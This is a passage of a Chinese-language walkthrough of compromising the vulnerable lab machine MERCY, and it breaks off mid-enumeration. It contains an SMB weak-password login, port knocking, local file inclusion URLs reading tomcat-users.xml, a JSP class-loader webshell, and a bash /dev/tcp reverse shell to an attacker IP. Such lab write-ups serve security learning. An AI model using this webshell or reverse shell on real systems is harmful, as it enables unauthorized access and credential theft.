lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401773.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401773.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325125025195\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u4e86\u56db\u4e2a\u7528\u6237\uff0c\u4e00\u4e2a\u5171\u4eab\u6587\u4ef6<\/p>\n<pre><code class=\"language-apl\">pleadformercy\nqiu\nthisisasuperduperlonguser\nfluffy\n\nqiu <\/code><\/pre>\n<p>\u5c1d\u8bd5\u8fde\u63a5\u4e0a\u53bb\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">smbclient \\\\\\\\192.168.37.132\\\\qiu -U &quot;qiu&quot;<\/code><\/pre>\n<p>\u4f7f\u7528\u5f31\u5bc6\u7801<code>password<\/code>\u767b\u8fdb\u53bb\u4e86\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401774.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401774.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325125949638\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u67e5\u770b\u4e00\u4e0b\u4e0b\u8f7d\u7684\u51e0\u4e2a\u6587\u4ef6\u3002<\/p>\n<pre><code class=\"language-bash\"># configprint\n#!\/bin\/bash\n\necho &quot;Here are settings for your perusal.&quot; &gt; config\necho &quot;&quot; &gt;&gt; config\necho &quot;Port Knocking Daemon Configuration&quot; &gt;&gt; config\necho &quot;&quot; &gt;&gt; config\ncat &quot;\/etc\/knockd.conf&quot; &gt;&gt; config\necho &quot;&quot; &gt;&gt; config\necho &quot;Apache2 Configuration&quot; &gt;&gt; config\necho &quot;&quot; &gt;&gt; config\ncat &quot;\/etc\/apache2\/apache2.conf&quot; &gt;&gt; config\necho &quot;&quot; &gt;&gt; config\necho &quot;Samba Configuration&quot; &gt;&gt; config\necho &quot;&quot; &gt;&gt; config\ncat &quot;\/etc\/samba\/smb.conf&quot; &gt;&gt; config\necho &quot;&quot; &gt;&gt; config\necho &quot;For other details of MERCY, please contact your system administrator.&quot; &gt;&gt; config\n\nchown qiu:qiu config<\/code><\/pre>\n<p>\u53d1\u73b0\u5305\u542b\u4e86<code>config<\/code>\u6587\u4ef6\uff0c\u6b64\u6587\u4ef6\u592a\u957f\u6211\u4eec\u5bfb\u627e\u662f\u5426\u5bf9\u6211\u4eec\u6709\u7528\u7684\uff1a<\/p>\n<pre><code class=\"language-text\">Here are settings for your perusal.\n\nPort Knocking Daemon Configuration\n\n[options]\n        UseSyslog\n\n[openHTTP]\n        sequence    = 159,27391,4\n        seq_timeout = 100\n        command     = \/sbin\/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT\n        tcpflags    = syn\n\n[closeHTTP]\n        sequence    = 4,27391,159\n        seq_timeout = 100\n        command     = \/sbin\/iptables -D INPUT -s %IP% -p tcp --dport 80 -j ACCEPT\n        tcpflags    = syn\n\n[openSSH]\n        sequence    = 17301,28504,9999\n        seq_timeout = 100\n        command     = \/sbin\/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT\n        tcpflags    = syn\n\n[closeSSH]\n        sequence    = 9999,28504,17301\n        seq_timeout = 100\n        command     = \/sbin\/iptables -D iNPUT -s %IP% -p tcp --dport 22 -j ACCEPT\n        tcpflags    = syn<\/code><\/pre>\n<p>\u770b\u6765\u8fd9\u5c31\u662f\u4e3a\u5565\u6211\u4eec\u4e0a\u9762\u626b\u63cf\u7684\u65f6\u5019\u88ab\u8fc7\u6ee4\u4e86\uff0c\u9700\u8981<code>knock<\/code>\u8fdb\u884c\u5f00\u542f\uff01\u7ee7\u7eed\u67e5\u770b\u4e0b\u8f7d\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-text\"># readme.txt\nThis is for your own eyes only. In case you forget the magic rules for remote administration.<\/code><\/pre>\n<p>\u5c1d\u8bd5Knock\u4e00\u4e0b\u7aef\u53e3\uff1a<\/p>\n<pre><code class=\"language-bash\">knock 192.168.37.132 159 27391 4\nknock 192.168.37.132 17301 28504 9999<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401775.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401775.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325130720144\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u5f00\u653e\u4e86\uff01<\/p>\n<h3>\u67e5\u770b80\u7aef\u53e3\u4fe1\u606f<\/h3>\n<pre><code class=\"language-text\">This machine shall make you plead for mercy! Bwahahahahaha! <\/code><\/pre>\n<p>\u626b\u63cf\u4e00\u4e0b\uff1a<\/p>\n<pre><code>nmap -sCV -p 80 192.168.37.132<\/code><\/pre>\n<pre><code class=\"language-apl\">PORT   STATE SERVICE VERSION\n80\/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))\n|_http-title: Site doesn&#039;t have a title (text\/html).\n|_http-server-header: Apache\/2.4.7 (Ubuntu)\n| http-robots.txt: 2 disallowed entries \n|_\/mercy \/nomercy<\/code><\/pre>\n<p>\u53d1\u73b0\u5b58\u5728\u4e24\u4e2a\u76ee\u5f55<code>mercy<\/code>\u548c<code>nomercy<\/code>\uff1a<\/p>\n<pre><code class=\"language-text\"># http:\/\/192.168.37.132\/mercy\/index\nWelcome to Mercy!\n\nWe hope you do not plead for mercy too much. If you do, please help us upgrade our website to allow our visitors to obtain more than just the local time of our system.<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401776.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401776.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325131406077\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u627e\u4e86\u4e00\u4e0b\u8fd9\u4e2aRIPS\u662f\u4e2a\u795e\u9b54\u4e1c\u6eaa\uff1a<\/p>\n<blockquote>\n<p><code>RIPS - A static source code analyser for vulnerabilities in PHP scripts<\/code><\/p>\n<p>RIPS is the most popular static code analysis tool to automatically detect vulnerabilities in PHP applications. By tokenizing and parsing all source code files, RIPS is able to transform PHP source code into a program model and to detect sensitive sinks (potentially vulnerable functions) that can be tainted by userinput (influenced by a malicious user) during the program flow. Besides the structured output of found vulnerabilities, RIPS offers an integrated code audit framework.<\/p>\n<p><code>IPS-\u9488\u5bf9PHP\u811a\u672c\u4e2d\u6f0f\u6d1e\u7684\u9759\u6001\u6e90\u4ee3\u7801\u5206\u6790\u5668<\/code><\/p>\n<p>RIPS\u662f\u6700\u6d41\u884c\u7684\u9759\u6001\u4ee3\u7801\u5206\u6790\u5de5\u5177\uff0c\u7528\u4e8e\u81ea\u52a8\u68c0\u6d4bPHP\u5e94\u7528\u7a0b\u5e8f\u4e2d\u7684\u6f0f\u6d1e\u3002\u901a\u8fc7\u6807\u8bb0\u5316\u548c\u89e3\u6790\u6240\u6709\u6e90\u4ee3\u7801\u6587\u4ef6\uff0cRIPS\u80fd\u591f\u5c06PHP\u6e90\u4ee3\u7801\u8f6c\u6362\u4e3a\u7a0b\u5e8f\u6a21\u578b\uff0c\u5e76\u68c0\u6d4b\u5728\u7a0b\u5e8f\u6d41\u671f\u95f4\u53ef\u80fd\u88ab\u7528\u6237\u8f93\u5165(\u53d7\u6076\u610f\u7528\u6237\u5f71\u54cd)\u6c61\u67d3\u7684\u654f\u611f\u63a5\u6536\u5668(\u6f5c\u5728\u6613\u53d7\u653b\u51fb\u7684\u51fd\u6570)\u3002\u9664\u4e86\u7ed3\u6784\u5316\u8f93\u51fa\u53d1\u73b0\u7684\u6f0f\u6d1e\u5916\uff0cRIPS\u8fd8\u63d0\u4f9b\u4e86\u4e00\u4e2a\u96c6\u6210\u7684\u4ee3\u7801\u5ba1\u8ba1\u6846\u67b6\u3002<\/p>\n<\/blockquote>\n<p>\u4e0d\u7ba1\u5b83\u662f\u5565\uff0c\u5b83\u6f0f\u4e86\u7248\u672c\uff0c\u627e\u4e00\u4e0b\u662f\u5426\u5b58\u5728\u6f0f\u6d1e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401777.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401777.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325131802413\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5b58\u5728\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\uff0c\u9614\u4ee5\uff0c\u4e0b\u8f7d\u4e0b\u6765\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\"># RIPS &lt;= 0.53 Multiple Local File Inclusion Vulnerabilities\n# Google Dork: allintitle: &quot;RIPS - A static source code analyser for\nvulnerabilities in PHP scripts&quot;\n# Althout this script is not intended to be accesible from internet, there\nare some websites that host it.\n# Download: http:\/\/sourceforge.net\/projects\/rips-scanner\/\n# Date: 23\/03\/12\n# Contact: mattdch0@gmail.com\n# Follow: @mattdch\n# www.localh0t.com.ar\n\nFile: \/windows\/code.php\n=======================\n\n102: file $lines = file($file);\n    96: $file = $_GET[&#039;file&#039;];\n\nPoC:\nhttp:\/\/localhost\/rips\/windows\/code.php?file=..\/..\/..\/..\/..\/..\/etc\/passwd\n\nFile: \/windows\/function.php\n===========================\n\n    64: file $lines = file($file);\n        58: $file = $_GET[&#039;file&#039;];\n\nPoC:\nhttp:\/\/localhost\/rips\/windows\/function.php?file=..\/..\/..\/..\/..\/..\/etc\/passwd(will\nread the first line of the file) <\/code><\/pre>\n<p>\u5c1d\u8bd5\u4e00\u4e0b\u8fd9\u4e2a<code>PoC<\/code>\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401778.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401778.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325132021802\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u9614\u4ee5\uff01\u6839\u636e8080\u7aef\u53e3\u5f97\u5230\u7684\u63d0\u793a\uff0c\u5c1d\u8bd5\u662f\u5426\u53ef\u4ee5\u5305\u542b<code>tomcat<\/code>\u7684\u8d26\u53f7\u5bc6\u7801\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401779.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401779.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325132436756\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-text\">http:\/\/192.168.37.132\/nomercy\/windows\/code.php?file=..\/..\/..\/..\/..\/..\/usr\/local\/tomcat\/tomcat7\/conf\/tomcat-users.xml\nhttp:\/\/192.168.37.132\/nomercy\/windows\/code.php?file=..\/..\/..\/..\/..\/..\/home\/qiu\/.tomcat\/conf\/tomcat-users.xml\nhttp:\/\/192.168.37.132\/nomercy\/windows\/code.php?file=..\/..\/..\/..\/..\/..\/etc\/tomcat7\/tomcat-users.xml<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401781.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401781.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325133430764\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u83b7\u5f97\u5230\u4e86\u8d26\u53f7\u5bc6\u7801\uff1a<\/p>\n<pre><code class=\"language-apl\">thisisasuperduperlonguser\nheartbreakisinevitable\n\nfluffy\nfreakishfluffybunny<\/code><\/pre>\n<h3>\u767b\u5f55\u4e0a\u4f20shell<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401782.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401782.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325133535522\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u767b\u5f55\u4e0a\u6765\u4e86\u4ee5\u540e\uff0c\u5c1d\u8bd5\u4e0a\u4f20<code>Jsp<\/code>\u6728\u9a6c\uff1a<\/p>\n<pre><code class=\"language-php\">\/\/ exp.jsp =&gt; exp.war\n&lt;%!\n    class U extends ClassLoader {\n        U(ClassLoader c) {\n            super(c);\n        }\n        public Class g(byte[] b) {\n            return super.defineClass(b, 0, b.length);\n        }\n    }\n\n    public byte[] base64Decode(String str) throws Exception {\n        try {\n            Class clazz = Class.forName(&quot;sun.misc.BASE64Decoder&quot;);\n            return (byte[]) clazz.getMethod(&quot;decodeBuffer&quot;, String.class).invoke(clazz.newInstance(), str);\n        } catch (Exception e) {\n            Class clazz = Class.forName(&quot;java.util.Base64&quot;);\n            Object decoder = clazz.getMethod(&quot;getDecoder&quot;).invoke(null);\n            return (byte[]) decoder.getClass().getMethod(&quot;decode&quot;, String.class).invoke(decoder, str);\n        }\n    }\n%&gt;\n&lt;%\n    String cls = request.getParameter(&quot;hack&quot;);\n    if (cls != null) {\n        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);\n    }\n%&gt;<\/code><\/pre>\n<p>\u4e0a\u4f20<code>exp.war<\/code>\u4ee5\u540e\u8fdb\u884c\u8fde\u63a5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401783.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401783.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325133844681\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8681\u5251\u8fde\u63a5\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401784.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401784.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325134443051\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u53cd\u5f39shell\u5230kali\u4e0a\u53bb\uff1a<\/p>\n<pre><code class=\"language-bash\"># tomcat\nbash -c &#039;exec bash -i &amp;&gt;\/dev\/tcp\/10.161.181.188\/1234 &lt;&amp;1&#039;<\/code><\/pre>\n<pre><code class=\"language-bash\"># kali\nnc -lvvp 1234<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401785.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403251401785.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240325134653484\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u5207\u6362\u81f3fluffy<\/h3>\n<p>\u521a\u624d\u5305\u542b\u7684\u65f6\u5019\u6709\u8fd9\u4e2a\u7528\u6237\uff1a<\/p>\n<pre><code class=\"language-apl\">fluffy\nfreakishfluffybunny<\/code><\/pre>\n<p>\u5c1d\u8bd5\u662f\u5426\u9614\u4ee5\u8fdb\u884c\u5207\u6362\uff1a<\/p>\n<pre><code class=\"language-bash\">tomcat7@MERCY:\/var\/lib\/tomcat7$ su fluffy    \nsu fluffy\nsu: must be run from a terminal<\/code><\/pre>\n<p>\u6269\u5c55\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">python -c &quot;import pty;pty.spawn(&#039;\/bin\/bash&#039;)&quot;<\/code><\/pre>\n<p>\u518d\u6b21\u5207\u6362\uff1a<\/p>\n<pre><code class=\"language-bash\">tomcat7@MERCY:\/var\/lib\/tomcat7$ su fluffy\nsu fluffy\nPassword: freakishfluffybunny\n\nAdded user fluffy.\n\n$ whoami;id\nwhoami;id\nfluffy\nuid=1003(fluffy) gid=1003(fluffy) groups=1003(fluffy)<\/code><\/pre>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<h4>\u57fa\u7840\u641c\u96c6<\/h4>\n<pre><code class=\"language-bash\">$ whoami;id\nwhoami;id\nfluffy\nuid=1003(fluffy) gid=1003(fluffy) groups=1003(fluffy)\n$ python -c &quot;import pty;pty.spawn(&#039;\/bin\/bash&#039;)&quot;\npython -c &quot;import pty;pty.spawn(&#039;\/bin\/bash&#039;)&quot;\nfluffy@MERCY:\/var\/lib\/tomcat7$ sudo -l\nsudo -l\n[sudo] password for fluffy: freakishfluffybunny\n\nSorry, user fluffy may not run sudo on MERCY.\nfluffy@MERCY:\/var\/lib\/tomcat7$ cat \/etc\/cron*\ncat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don&#039;t have to run the `crontab&#039;\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# m h dom mon dow user  command\n17 *    * * *   root    cd \/ &amp;&amp; run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.daily )\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.weekly )\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.monthly )\n#\ncat: \/etc\/cron.weekly: Is a directory\nfluffy@MERCY:\/var\/lib\/tomcat7$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\nfind \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/sbin\/pppd\n\/usr\/sbin\/uuidd\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/lib\/authbind\/helper\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/landscape\/apt-update\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/bin\/procmail\n\/usr\/bin\/chfn\n\/usr\/bin\/traceroute6.iputils\n\/usr\/bin\/lppasswd\n\/usr\/bin\/gpasswd\n\/usr\/bin\/at\n\/usr\/bin\/passwd\n\/usr\/bin\/newgrp\n\/usr\/bin\/chsh\n\/usr\/bin\/sudo\n\/usr\/bin\/pkexec\n\/usr\/bin\/mtr\n\/sbin\/mount.cifs\n\/bin\/umount\n\/bin\/ping\n\/bin\/mount\n\/bin\/fusermount\n\/bin\/ping6\n\/bin\/su<\/code><\/pre>\n<h4>\u67e5\u770b\u654f\u611f\u76ee\u5f55<\/h4>\n<pre><code class=\"language-bash\">fluffy@MERCY:\/var\/lib\/tomcat7$ cd \/home\/fluffy\ncd \/home\/fluffy\nfluffy@MERCY:~$ ls -la\nls -la\ntotal 16\ndrwxr-x--- 3 fluffy fluffy 4096 Nov 20  2018 .\ndrwxr-xr-x 6 root   root   4096 Nov 20  2018 ..\n-rw------- 1 fluffy fluffy   12 Nov 20  2018 .bash_history\ndrwxr-xr-x 3 fluffy fluffy 4096 Nov 20  2018 .private\nfluffy@MERCY:~$ cd .private\ncd .private\nfluffy@MERCY:~\/.private$ ls -la\nls -la\ntotal 12\ndrwxr-xr-x 3 fluffy fluffy 4096 Nov 20  2018 .\ndrwxr-x--- 3 fluffy fluffy 4096 Nov 20  2018 ..\ndrwxr-xr-x 2 fluffy fluffy 4096 Nov 20  2018 secrets\nfluffy@MERCY:~\/.private$ cd secrets\ncd secrets\nfluffy@MERCY:~\/.private\/secrets$ ls -la\nls -la\ntotal 20\ndrwxr-xr-x 2 fluffy fluffy 4096 Nov 20  2018 .\ndrwxr-xr-x 3 fluffy fluffy 4096 Nov 20  2018 ..\n-rwxr-xr-x 1 fluffy fluffy   37 Nov 20  2018 backup.save\n-rw-r--r-- 1 fluffy fluffy   12 Nov 20  2018 